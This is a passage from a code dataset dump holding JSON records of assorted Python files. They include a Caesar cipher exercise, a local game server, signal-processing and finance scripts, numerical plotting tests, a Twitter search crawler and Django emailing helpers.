]:\n\n\n\n","sub_path":"hw5/hw5_rnn.py","file_name":"hw5_rnn.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"227153155","text":"#6\ndef encrypt(teks, n):\n \n listTeks = list(teks)\n\n for x in range(len(listTeks)):\n \n if(listTeks[x] != ' '):\n \n if(ord(listTeks[x]) + n < 90):\n asciiCode = ord(listTeks[x])\n dienkripsi = asciiCode + n\n listTeks[x] = chr(dienkripsi)\n\n else :\n asciiCode = ord(listTeks[x])\n dienkripsi = (asciiCode + n) - 26\n listTeks[x] = chr(dienkripsi)\n\n else : \n continue\n\n hasil = ''.join(listTeks)\n\n return hasil\n\n\ntry :\n \n teks = input('Inputkan teks yang ingin dienkripsi :')\n n = int(input('Berapa jumlah geseran enkripsi :'))\n\n hasil = encrypt(teks, n)\n print('\\nHasil enkripsi dari teks {0} yaitu : {1}'.format(teks, hasil))\n\nexcept ValueError :\n print('Inputkan khusus bilangan bulat')\n","sub_path":"6.C10.py","file_name":"6.C10.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"631396256","text":"#coding:utf-8\nimport urllib.parse\n# import urllib\na = \"中文\"\nb = urllib.parse.quote(a) #转url编码\nprint(b)\nurl = \"http://zzk.cnblogs.com/s/blogpost?Keywords=%s\"%b\nprint(url)\n\nimport requests\n# requests 自动转\nr = requests.get(\"http://zzk.cnblogs.com/s/blogpost?Keywords=%s\"%a)\nprint(r.url)\n\n# url 解码\nc = \"%E4%B8%AD%E6%96%87\"\nd = \"NGlZ7gInT8Lqg0tnETU1Pw==\"\nprint(urllib.parse.unquote(d))\nprint(urllib.parse.unquote(r.url))\n\nimport base64\nprint(base64.b64encode(d))","sub_path":"auto_python/demo7_url.py","file_name":"demo7_url.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"603782252","text":"#OK!\r\nimport socket\r\nimport threading\r\nfrom gracz import Gracz\r\nfrom gra import Gra\r\nimport json\r\n\r\n\r\nclass Server(object):\r\n GRACZE = 2 # Ilość klientów, która musi podłączyć się do serwera, aby gra rozpoczeła się\r\n\r\n def __init__(self):\r\n self.kolejka = []\r\n self.numer_gry = 0\r\n\r\n def gracz_thread(self, polaczenie, gracz):\r\n \r\n while True:\r\n try:\r\n try:\r\n dane = polaczenie.recv(1024)\r\n dane = json.loads(dane.decode())\r\n except Exception as e:\r\n break\r\n\r\n keys = [int(key) for key in dane.keys()]\r\n wyslij_informacje = {key:[] for key in keys}\r\n ostatni_gracz = None\r\n\r\n for key in keys:\r\n if key == -1:\r\n if gracz.gra:\r\n wyslij = {gracz.get_nazwa():gracz.get_wynik() for gracz in gracz.gra.gracze}\r\n wyslij_informacje[-1] = wyslij\r\n else:\r\n wyslij_informacje[-1] = []\r\n\r\n if gracz.gra:\r\n if key == 0:\r\n poprawna_odpowiedz = gracz.gra.proba_zgadniecia(gracz, dane['0'][0])\r\n wyslij_informacje[0] = poprawna_odpowiedz\r\n elif key == 1:\r\n pomin_runde = gracz.gra.pomin(gracz)\r\n wyslij_informacje[1] = pomin_runde\r\n elif key == 2:\r\n chat_tablica = gracz.gra.runda.chat.get_chat()\r\n wyslij_informacje[2] = chat_tablica\r\n elif key == 3:\r\n tablica = gracz.gra.tablica.get_tablica()\r\n if ostatni_gracz != tablica:\r\n ostatni_gracz = tablica\r\n wyslij_informacje[3] = tablica\r\n\r\n elif key == 4:\r\n wyniki = gracz.gra.get_wyniki_gracza()\r\n wyslij_informacje[4] = wyniki\r\n #######################################\r\n # Obsługa klucza 5\r\n\r\n elif key == 5:\r\n runda = gracz.gra.liczba_rund - 1\r\n wyslij_informacje[5] = runda\r\n\r\n #######################################\r\n elif key == 6:\r\n haslo = gracz.gra.runda.haslo\r\n wyslij_informacje[6] = haslo\r\n elif key == 7:\r\n liczba_pominiec = gracz.gra.runda.liczba_pominiec\r\n wyslij_informacje[7] = liczba_pominiec\r\n elif key == 8:\r\n if gracz.gra.runda.rysujacy == gracz:\r\n x, y, kolor = dane['8'][:3]\r\n gracz.gra.update_tablica(x, y, kolor)\r\n elif key == 9:\r\n t = gracz.gra.runda.czas\r\n wyslij_informacje[9] = t\r\n elif key == 10:\r\n gracz.gra.tablica.czyszczenie()\r\n elif key == 11:\r\n wyslij_informacje[11] = gracz.gra.runda.rysujacy == gracz\r\n\r\n wyslij_informacje = json.dumps(wyslij_informacje)\r\n polaczenie.sendall(wyslij_informacje.encode() + \".\".encode())\r\n except Exception as e:\r\n print(e)\r\n break\r\n\r\n if gracz.gra:\r\n gracz.gra.rozlaczony_gracz(gracz)\r\n\r\n if gracz in self.kolejka:\r\n self.kolejka.remove(gracz)\r\n\r\n print(F\" {gracz.nazwa} rozłączył się z serwerem\")\r\n polaczenie.close()\r\n\r\n def obsluga_kolejki(self, gracz):\r\n\r\n self.kolejka.append(gracz)\r\n\r\n if len(self.kolejka) >= self.GRACZE:\r\n gra = Gra(self.numer_gry, self.kolejka[:])\r\n\r\n for g in gra.gracze:\r\n g.zacznij_gre(gra)\r\n\r\n self.numer_gry += 1\r\n self.kolejka = []\r\n print(f\"Gra {self.numer_gry - 1} rozpoczeła się\")\r\n\r\n def obsluga_polaczenia(self, polaczenie, adres):\r\n\r\n try:\r\n dane = polaczenie.recv(1024)\r\n nazwa = str(dane.decode())\r\n if not nazwa:\r\n raise Exception(\"Brak nazwy\")\r\n\r\n polaczenie.sendall(\"1\".encode())\r\n\r\n gracz = Gracz(adres, nazwa)\r\n self.obsluga_kolejki(gracz)\r\n thread = threading.Thread(target=self.gracz_thread, args=(polaczenie, gracz))\r\n thread.start()\r\n except Exception as e:\r\n print(e)\r\n polaczenie.close()\r\n\r\n def polaczenie_thread(self):\r\n server = \"127.0.0.1\"\r\n port = 8000\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n try:\r\n s.bind((server, port))\r\n except socket.error as e:\r\n str(e)\r\n\r\n s.listen(2)\r\n print(\"Czekanie na nawiązanie połączenia\")\r\n\r\n while True:\r\n polaczenie, adres = s.accept()\r\n print(\"Nawiązano nowe połączenie.\")\r\n\r\n self.obsluga_polaczenia(polaczenie, adres)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = Server()\r\n thread = threading.Thread(target=s.polaczenie_thread)\r\n thread.start()\r\n","sub_path":"Kalambury/Zadanie2/server/obsluga_serwera.py","file_name":"obsluga_serwera.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"260038176","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nj=np.complex(0,1)\n#for discrete inputs\n#x=[0,1,1,1,1]\n\n#for sin input \nb=np.arange(0,10*np.pi,0.5)\nz=5*(np.sin(b))\n#print(z)\n\na1=plt.subplot(3,1,1)\nplt.stem(b,z)\n#plt.stem(x)\n\nx=z\nxmag=[]\nxphase=[]\nN=1000\n\nw=np.linspace(-np.pi,np.pi,N)\ns=0\nfor i in range(0,N):\n\tfor k in range (0,len(x)):\n\t\t\ts=s+(x[k]*np.exp(-k*w[i]*j))\n\txmag.append(np.abs(s))\n\txphase.append(np.angle(s))\n\ts=0\nplt.subplot(3,1,2)\nplt.plot(w,xmag)\nplt.subplot(3,1,3)\nplt.plot(w,xphase)\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"dtft.py","file_name":"dtft.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"375706451","text":"import numpy as np\r\nimport pandas as pd\r\nimport os\r\nfrom collections import Counter\r\nfrom random import shuffle\r\n\r\nos.chdir(r'H:/python/gtav/training data new')\r\n\r\nfiles = []\r\n\r\na = []\r\nw = []\r\ns = []\r\nd = []\r\nwa = []\r\nwd = []\r\nsa = []\r\nsd = []\r\nnok = []\r\n\r\ntotal = 0\r\n#{'A': 10141, 'W': 139798, 'S': 2102, 'D': 10155,\r\n#'WA': 91927, 'WD': 90380, 'SA': 1826, 'SD': 2904, 'None': 11253}\r\nfor file in os.listdir('.'):\r\n\r\n datas = np.load(file, allow_pickle=True)\r\n \r\n total += len(datas)\r\n for data in datas:\r\n img = data[0]\r\n control = data[1]\r\n\r\n if control == [1, 0, 0, 0, 0, 0, 0, 0, 0]:\r\n for i in range(5): a.append([img, control])\r\n elif control == [0, 1, 0, 0, 0, 0, 0, 0, 0]:\r\n w.append([img, control])\r\n elif control == [0, 0, 1, 0, 0, 0, 0, 0, 0]:\r\n for i in range(25): s.append([img, control])\r\n elif control == [0, 0, 0, 1, 0, 0, 0, 0, 0]:\r\n for i in range(6): d.append([img, control])\r\n elif control == [0, 0, 0, 0, 1, 0, 0, 0, 0]:\r\n wa.append([img, control])\r\n elif control == [0, 0, 0, 0, 0, 1, 0, 0, 0]:\r\n wd.append([img, control])\r\n elif control == [0, 0, 0, 0, 0, 0, 1, 0, 0]:\r\n for i in range(25): sa.append([img, control])\r\n elif control == [0, 0, 0, 0, 0, 0, 0, 1, 0]:\r\n for i in range(25): sd.append([img, control])\r\n elif control == [0, 0, 0, 0, 0, 0, 0, 0, 1]:\r\n for i in range(6): nok.append([img, control]) \r\n\r\nminLen = len(w)\r\nfor i in [a, w, s, d, wa, wd, sa, sd, nok]:\r\n shuffle(i)\r\n if minLen > len(i):\r\n minLen = len(i)\r\n \r\na = a[:minLen]\r\nw = w[:minLen]\r\ns = s[:minLen]\r\nd = d[:minLen]\r\nwa = wa[:minLen]\r\nwd = wd[:minLen]\r\nsa = sa[:minLen]\r\nsd = sd[:minLen]\r\nnok = nok[:minLen]\r\n\r\nprint(f'A: {len(a)}\\nW: {len(w)}\\nS: {len(s)}\\nD: {len(d)}\\nWA: {len(wa)}\\nWD: {len(wd)}\\nSA: {len(sa)}\\nSD: {len(sd)}\\nNoKey: {len(nok)}')\r\n\r\nprint('Starting count: ',total)\r\nfinal_data = a + w + s + d + wa + wd + sa + sd + nok\r\nshuffle(final_data)\r\nprint('Balanced data: ', len(final_data))\r\n\r\nc = 'ALL'\r\nnp.save(f'balanced_data_for_training_{c}.npy', final_data)\r\n","sub_path":"gtav/balancing training data -BIGGER MODEL - Copy.py","file_name":"balancing training data -BIGGER MODEL - Copy.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"59725644","text":"from lib.graph import TreeNode\n\n\ndef get_order_list(node, lst):\n if node is None:\n lst.append(\"None\")\n return\n\n lst.append(node.data)\n get_order_list(node.left, lst)\n get_order_list(node.right, lst)\n\n\ndef contains_tree(n1, n2):\n l1 = []\n l2 = []\n\n get_order_list(n1, l1)\n get_order_list(n2, l2)\n\n return ''.join([str(i) for i in l2]) in ''.join([str(i) for i in l1])\n\n\nif __name__ == '__main__':\n root1 = TreeNode(1)\n root1.left = TreeNode(2)\n root1.right = TreeNode(3)\n root1.left.left = TreeNode(4)\n\n root2 = TreeNode(2)\n root2.left = TreeNode(4)\n\n print(contains_tree(root1, root2))\n","sub_path":"chapter_4/10_check_subtree/pre_order.py","file_name":"pre_order.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"66520109","text":"class Pound:\n value = 1.00\n colour = \"gold\"\n num_edges = 1\n diameter = 22.5 #mm\n thickness = 3.15 #mm\n heads = True\n\ncoin1 = Pound()\nprint(type(coin1))\n\nprint(coin1.value)\ncoin1.colour = \"greenish\"\nprint(coin1.colour)\ncoin2 = Pound()\nprint(coin2.colour)\ncoin1.value = 1.25\nprint(coin1.value)\nprint(coin2.value)\n\n","sub_path":"src/python_tutorial/tutorial_27.py","file_name":"tutorial_27.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"406182416","text":"# © Copyright, Fervent | All Rights Reserved\n\"\"\"\n# =====================================================\n# EXPECTED RETURNS USING MEAN - APPLIED\n# =====================================================\n\n# -----------\n# Beginner?\n# -----------\nWe STRONGLY recommend using the .ipynb version instead of this .py version\nThe .ipynb has more explanatory notes to help and guide you through.\n\nThe .py version is largely designed for more intermediate / advanced users of\nPython.\n\"\"\"\n# Import package dependencies\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\ndf = pd.read_csv(\"../data/fb_price.csv\") # Read in fb price data as a pandas dataframe\ndf = df[['Date', 'Adj Close']] # Extract relevant columns\n\ndf.rename(columns={'Date' : 'date', 'Adj Close' : 'price_t'},\n inplace=True) # Rename columns to better match PEP8 standards\n\ndf['returns'] = df['price_t'].pct_change(1) # Calculate returns\n\n# Calculate the mean based Expected Return\n# Create a new column for the Expected Return on Facebook\ndf['expected_return_fb'] = df['returns'].mean()\n\n# Set the date column as the index to ensure we have dates in the plot.\ndf.set_index('date', inplace=True)\n\n# Plot the Returns and Expected Return of Facebook\ndf[['returns', 'expected_return_fb']].plot(figsize=(12, 8))\n\n# Estimate a 30 Day Moving Average (\"MA\") Expected Return\ndf['expected_return_ma_30d'] = df['returns'].rolling(30).mean()\n\n# Estimate a 7 Day Moving Average (\"MA\") Expected Return\n# Note that the first 6 observations for expected_return_ma_30d will be NaN\n# This is because we're estimating a 7 Day Rolling Mean.\n# Naturally, the first 6 won't have any mean!\ndf['expected_return_ma_7d'] = df['returns'].rolling(7).mean()\n\n# Plot all the time series\ndf[['returns', 'expected_return_fb',\n 'expected_return_ma_30d', 'expected_return_ma_7d']].plot(figsize=(12, 8))\n\n# ============================\n# BONUS: BETTER PLOTTING\n# ============================\ndf[['returns', 'expected_return_fb', 'expected_return_ma_30d']].plot(\n figsize=(12, 8), color=('#39b8eb', '#ffbd4a', '#7a7878'),\n title='Static Mean vs. 30 Day Moving Average')\n\ndf[['returns', 'expected_return_fb',\n 'expected_return_ma_30d', 'expected_return_ma_7d']].plot(\n figsize=(12, 8), color=('#39b8eb', '#ffbd4a', '#121111', '#7a7878'),\n title='Mean vs. Moving Averages')\n","sub_path":"finance/expected_return_mean.py","file_name":"expected_return_mean.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"558995945","text":"\"\"\"\nName: Test_CommonRoutines.py\nAuthor: Sid Bishnu\nDetails: As the name implies, this script tests the various functions of \n../../src/DGSEM_Rotating_Shallow_Water/CommonRoutines.py.\n\"\"\"\n\n\nimport numpy as np\nimport os\nimport sys\nsys.path.append(os.path.realpath('../..') + '/src/DGSEM_Rotating_Shallow_Water/')\nfrom IPython.utils import io\nwith io.capture_output() as captured:\n import CommonRoutines as CR\n\n\ndef TestRoundArray():\n x = np.array([-1.75,1.75,-2.25,2.25])\n xRounded = CR.RoundArray(x)\n print('The array x is')\n print(x)\n print('After rounding, the array x becomes')\n print(xRounded)\n\n\ndo_TestRoundArray = False\nif do_TestRoundArray:\n TestRoundArray()\n\n\ndef TestPythonPlot1DSaveAsPDF():\n x = np.arange(0.0,10.0,1.0) # Syntax is x = np.arange(First Point, Last Point, Interval).\n y = np.arange(0.0,20.0,2.0)\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n CR.PythonPlot1DSaveAsPDF(output_directory,'regular',x,y,2.0,'-','k',True,'s',7.5,['x','y'],[17.5,17.5],[10.0,10.0],\n [15.0,15.0],'Python Plot 1D',20.0,True,'PythonPlot1D',False)\n\n\ndo_TestPythonPlot1DSaveAsPDF = False\nif do_TestPythonPlot1DSaveAsPDF:\n TestPythonPlot1DSaveAsPDF()\n \n \ndef TestPythonPlots1DSaveAsPDF():\n x = np.arange(0.0,10.0,1) # Syntax is x = np.arange(First Point, Last Point, Interval).\n y1 = np.arange(0.0,20.0,2)\n y2 = np.arange(0.0,40.0,4)\n yAll = np.zeros((2,len(x)))\n yAll[0,:] = y1\n yAll[1,:] = y2\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n CR.PythonPlots1DSaveAsPDF(output_directory,'regular',x,yAll,[2.0,2.0],['-','--'],['r','b'],[True,True],['s','D'],\n [10.0,10.0],['x','y'],[17.5,17.5],[10.0,10.0],[15.0,15.0],['y1','y2'],17.5,'center left',\n 'Python Plots 1D',20.0,True,'PythonPlots1D',False)\n \n \ndo_TestPythonPlots1DSaveAsPDF = False\nif do_TestPythonPlots1DSaveAsPDF:\n TestPythonPlots1DSaveAsPDF()\n \n \ndef TestPythonConvergencePlot1DSaveAsPDF():\n x = np.arange(0.0,10.0,1) # Syntax is x = np.arange(First Point, Last Point, Interval)\n y1 = np.arange(0.0,20.0,2)\n y2 = np.arange(0.0,20.0,2)\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n CR.PythonConvergencePlot1DSaveAsPDF(output_directory,'regular',x,y1,y2,[2.0,2.0],['-',' '],['k','k'],[False,True],\n ['s','s'],[10.0,10.0],['x','y'],[17.5,17.5],[10.0,10.0],[15.0,15.0],['y1','y2'],\n 17.5,'upper left','Convergence Plot 1D',20.0,True,'ConvergencePlot1D',False,\n drawMajorGrid=True,legendWithinBox=True)\n\n\ndo_TestPythonConvergencePlot1DSaveAsPDF = False\nif do_TestPythonConvergencePlot1DSaveAsPDF:\n TestPythonConvergencePlot1DSaveAsPDF()\n \n\ndef TestWriteTecPlot2DStructured():\n xLeft = 0.0\n xRight = 60.0\n nX = 60\n x = np.linspace(xLeft,xRight,nX+1) \n xCenter = x[int(nX/2)]\n yBottom = 0.0\n yTop = 50.0\n nY = 50\n y = np.linspace(yBottom,yTop,nY+1)\n yCenter = y[int(nY/2)]\n phi = np.zeros((nX+1,nY+1))\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n phi[iX,iY] = (x[iX]-xCenter)**2.0 + (y[iY]-yCenter)**2.0\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'TestWriteTecPlot2DStructured'\n CR.WriteTecPlot2DStructured(output_directory,x,y,phi,filename)\n \n \ndo_TestWriteTecPlot2DStructured = False\nif do_TestWriteTecPlot2DStructured: \n TestWriteTecPlot2DStructured()\n \n \ndef TestWriteTecPlot2DUnstructured():\n xLeft = 0.0\n xRight = 60.0\n nX = 60\n x = np.linspace(xLeft,xRight,nX+1) \n xCenter = x[int(nX/2)]\n yBottom = 0.0\n yTop = 50.0\n nY = 50\n y = np.linspace(yBottom,yTop,nY+1)\n yCenter = y[int(nY/2)]\n xUnstructured = np.zeros((nX+1)*(nY+1))\n yUnstructured = np.zeros((nX+1)*(nY+1))\n phiUnstructured = np.zeros((nX+1)*(nY+1))\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n i = iY*(nX+1) + iX\n xUnstructured[i] = x[iX]\n yUnstructured[i] = y[iY]\n phiUnstructured[i] = (xUnstructured[i]-xCenter)**2.0 + (yUnstructured[i]-yCenter)**2.0\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'TestWriteTecPlot2DUnstructured'\n CR.WriteTecPlot2DUnstructured(output_directory,xUnstructured,yUnstructured,phiUnstructured,filename)\n \n \ndo_TestWriteTecPlot2DUnstructured = False\nif do_TestWriteTecPlot2DUnstructured: \n TestWriteTecPlot2DUnstructured()\n \n \ndef TestReadTecPlot2DStructured():\n x = np.array([1,2,3],dtype=int) \n y = x\n nX = len(x) - 1\n nY = len(y) - 1\n phi = np.zeros((nX+1,nY+1))\n print('Writing structured array to file:\\niX iY x y phi')\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n phi[iX,iY] = (x[iX])**2.0 + (y[iY])**2.0\n print('%1d %1d %1d %1d %2.2d' %(iX,iY,x[iX],y[iY],phi[iX,iY]))\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'TestReadTecPlot2DStructured'\n CR.WriteTecPlot2DStructured(output_directory,x,y,phi,filename)\n filename += '.tec'\n x, y, phi = CR.ReadTecPlot2DStructured(output_directory,filename,ReturnIndependentVariables=True)\n print('\\nReading structured array from file:\\niX iY x y phi')\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n print('%1d %1d %1d %1d %2.2d' %(iX,iY,x[iX],y[iY],phi[iX,iY]))\n \n \ndo_TestReadTecPlot2DStructured = False\nif do_TestReadTecPlot2DStructured: \n TestReadTecPlot2DStructured()\n \n \ndef TestReadTecPlot2DUnstructured():\n x = np.array([1,2,3],dtype=int) \n y = x\n nX = len(x) - 1\n nY = len(y) - 1\n xUnstructured = np.zeros((nX+1)*(nY+1))\n yUnstructured = np.zeros((nX+1)*(nY+1))\n phiUnstructured = np.zeros((nX+1)*(nY+1))\n print('Writing unstructured array to file:\\ni x y phi')\n for iY in range(0,nY+1):\n for iX in range(0,nX+1):\n i = iY*(nX+1) + iX\n xUnstructured[i] = x[iX]\n yUnstructured[i] = y[iY]\n phiUnstructured[i] = (xUnstructured[i])**2.0 + (yUnstructured[i])**2.0\n print('%1d %1d %1d %2.2d' %(i,xUnstructured[i],yUnstructured[i],phiUnstructured[i]))\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'TestReadTecPlot2DUnstructured'\n CR.WriteTecPlot2DUnstructured(output_directory,xUnstructured,yUnstructured,phiUnstructured,filename)\n filename += '.tec'\n xUnstructured, yUnstructured, phiUnstructured = (\n CR.ReadTecPlot2DUnstructured(output_directory,filename,ReturnIndependentVariables=True))\n print('\\nReading structured array from file:\\ni x y phi')\n for i in range(0,(nX+1)*(nY+1)):\n print('%1d %1d %1d %2.2d' %(i,xUnstructured[i],yUnstructured[i],phiUnstructured[i]))\n \n \ndo_TestReadTecPlot2DUnstructured = False\nif do_TestReadTecPlot2DUnstructured: \n TestReadTecPlot2DUnstructured()\n \n \ndef TestPythonReadFileAndMakeFilledContourPlot2D():\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filenameStructured = 'TestWriteTecPlot2DStructured.tec'\n filenameUnstructured = 'TestWriteTecPlot2DUnstructured.tec'\n nContours = 300\n labels = ['x','y']\n labelfontsizes = [17.5,17.5]\n labelpads = [10.0,10.0]\n tickfontsizes = [15.0,15.0]\n useGivenColorBarLimits = False\n ColorBarLimits = [0.0,0.0]\n nColorBarTicks = 6\n title = 'Two-Dimensional Gaussian Function'\n titlefontsize = 22.5\n SaveAsPDF = True\n Show = False\n CR.PythonReadFileAndMakeFilledContourPlot2D(output_directory,filenameStructured,nContours,labels,labelfontsizes,\n labelpads,tickfontsizes,useGivenColorBarLimits,ColorBarLimits,\n nColorBarTicks,title,titlefontsize,SaveAsPDF,Show,DataType='Structured')\n CR.PythonReadFileAndMakeFilledContourPlot2D(output_directory,filenameUnstructured,nContours,labels,labelfontsizes,\n labelpads,tickfontsizes,useGivenColorBarLimits,ColorBarLimits,\n nColorBarTicks,title,titlefontsize,SaveAsPDF,Show,\n DataType='Unstructured')\n \n \ndo_TestPythonReadFileAndMakeFilledContourPlot2D = False\nif do_TestPythonReadFileAndMakeFilledContourPlot2D: \n TestPythonReadFileAndMakeFilledContourPlot2D()\n\n\ndef Test_WriteStateVariableLimitsToFile_ReadStateVariableLimitsFromFile():\n StateVariableLimits = np.zeros(2)\n StateVariableLimits[0] = np.exp(1.0)\n StateVariableLimits[1] = np.pi\n output_directory = '../../output/DGSEM_Rotating_Shallow_Water_Output/'\n filename = 'StateVariableLimits'\n CR.WriteStateVariableLimitsToFile(output_directory,StateVariableLimits,filename)\n print('The state variable limits written to file are: [%.15f %.15f].' \n %(StateVariableLimits[0],StateVariableLimits[1]))\n filename += '.curve'\n StateVariableLimits = CR.ReadStateVariableLimitsFromFile(output_directory,filename)\n print('The state variable limits read from file are: [%.15f %.15f].' \n %(StateVariableLimits[0],StateVariableLimits[1]))\n \n \ndo_Test_WriteStateVariableLimitsToFile_ReadStateVariableLimitsFromFile = False\nif do_Test_WriteStateVariableLimitsToFile_ReadStateVariableLimitsFromFile: \n Test_WriteStateVariableLimitsToFile_ReadStateVariableLimitsFromFile()","sub_path":"tests/DGSEM_Rotating_Shallow_Water_Tests/Test_CommonRoutines.py","file_name":"Test_CommonRoutines.py","file_ext":"py","file_size_in_byte":9653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"288138277","text":"import unittest\n\nimport sys\nclass Solution(unittest.TestCase):\n #my bad, and the problem is the speed not taken care of well\n def longestWord_TLE_ming(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: str\n \"\"\"\n mx = -sys.maxsize\n res = None\n for word in words:\n print('word: %s ' % word)\n size = len(word)\n temp = str(word)\n buildable = True\n while len(temp) > 0:\n temp = temp[:-1]\n print('temp: %s ' % temp)\n if temp != '' and temp not in words:\n buildable = False\n break\n if buildable and size > mx:\n mx = max(mx, size)\n res = word\n return res\n\n #the trick is sorting\n def longestWord(self, words):\n valids = {''}\n for word in sorted(words):\n if word[:-1] in valids:\n valids.add(word)\n return max(sorted(valids), key=len)\n \n \n\n def test_longestWord(self):\n words = [\"w\",\"wo\",\"wor\",\"worl\", \"world\"]\n res = self.longestWord(words)\n print('res: %s ' % res)\n self.assertTrue(res == 'world')\n\n words = [\"a\", \"banana\", \"app\", \"appl\", \"ap\", \"apply\", \"apple\"]\n res = self.longestWord(words)\n print('res: %s ' % res)\n self.assertTrue(res == 'apple') #not apply\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Python/longestWord.py","file_name":"longestWord.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"542174877","text":"\"\"\"\nUse Twitter search APIs find tweets from specific location.\nRaw tweets are stored in specified couchDB databse.\nThis twitter searcher prevents the duplicate dataset return by the API server by using the upper bound and lower bound parameter.\n\"\"\"\n\nimport logging\nimport tweepy\nimport couchdb\n\nclass TwitterSearcher():\n \"\"\"Use Twitter search APIs find tweets from specific location.\"\"\"\n\n def __init__(self, api, db, geo, query):\n \"\"\"Set variables required by Twitter Search API.\"\"\"\n self.api = api\n self.db = db\n self.geo = geo\n self.query = query\n self.limit = 100\n\n def search(self):\n \"\"\"Search for tweets via Twitter Search API.\n Since id of each tweet is decreasing in every return dataset and the created time is also decreasing. The first line of the\n return dataset will be the newest created twitter while the last line will be the oldest one in this return dataset.\n \"\"\"\n # default no lower bound.\n lower_id = None\n # default no upper bound.\n upper_id = -1\n\n # Track number of tweets returned in total.\n tweet_count = 0\n count = 0\n\n # Pull tweets until error or no more to process.\n while True:\n try:\n # if there is no upper bounder\n if (upper_id <= 0):\n # if there is no lower bound\n if (not lower_id):\n new_tweets = self.api.search(\n q=self.query,\n geocode=self.geo,\n count=self.limit\n )\n # if there is lower bound\n else:\n new_tweets = self.api.search(\n q=self.query,\n geocode=self.geo,\n count=self.limit,\n since_id=lower_id\n )\n else:\n # if there is no lower bound\n if (not lower_id):\n new_tweets = self.api.search(\n q=self.query,\n geocode=self.geo,\n count=self.limit,\n max_id=str(upper_id - 1)\n )\n # if there is lower bounder.\n else:\n new_tweets = self.api.search(\n q=self.query,\n geocode=self.geo,\n count=self.limit,\n max_id=str(upper_id - 1),\n since_id=lower_id\n )\n\n # Exit when no new tweets are found.\n if not new_tweets:\n logging.info(\"No more tweets to read.\")\n break\n\n # Process received tweets.\n for tweet in new_tweets:\n jtweet = tweet._json\n if tweet.coordinates or tweet.place:\n # store tweets with geo code.\n jtweet['_id'] = jtweet['id_str']\n try:\n self.db.save(jtweet)\n except couchdb.http.ResourceConflict:\n logging.info(\"Ignored duplicate tweet.\")\n\n # Output current number of tweets.\n tweet_count += len(new_tweets)\n logging.info(\"Downloaded {0} tweets\".format(tweet_count))\n\n # Track upper id. Use the id of last tweet in the previous return result as the new upper_id.\n upper_id = new_tweets[-1].id\n # Exit upon error.\n except tweepy.TweepError as e:\n logging.error(str(e))\n break","sub_path":"3_crawler/old/crawlerSearch.py","file_name":"crawlerSearch.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"540498636","text":"# -*- coding: utf-8 -*-\r\n\"\"\"utilities\"\"\"\r\n\r\nfrom datetime import datetime\r\nimport re\r\nimport sys\r\n\r\nfrom django.conf import settings\r\nfrom django.core.mail import get_connection, EmailMultiAlternatives\r\nfrom django.template.loader import get_template\r\nfrom django.utils import translation\r\nfrom django.utils.translation import get_language as django_get_language\r\nfrom django.urls import reverse\r\n\r\nfrom ...logger import logger\r\nfrom ...models import Newsletter\r\nfrom ...settings import get_newsletter_context_callbacks\r\nfrom ...utils import dehtml, make_links_absolute\r\n\r\nfrom .models import Emailing, MagicLink, Contact\r\n\r\n\r\nclass EmailSendError(Exception):\r\n \"\"\"An exception raise when sending email failed\"\"\"\r\n pass\r\n\r\n\r\ndef format_context(text, data):\r\n \"\"\"replace custom templating by something compliant with python format function\"\"\"\r\n\r\n # { and } need to be escaped for the format function\r\n text = text.replace('{', '{{').replace('}', '}}')\r\n\r\n # #!- and -!# are turned into { and }\r\n text = text.replace('#!-', '{').replace('-!#', '}')\r\n\r\n return text.format(**data)\r\n\r\n\r\ndef get_emailing_context(emailing, contact):\r\n \"\"\"get context for emailing: user,....\"\"\"\r\n data = dict(contact.__dict__)\r\n for field in ('fullname', ):\r\n data[field] = getattr(contact, field)\r\n \r\n # clone the object: Avoid overwriting {tags} for ever\r\n newsletter 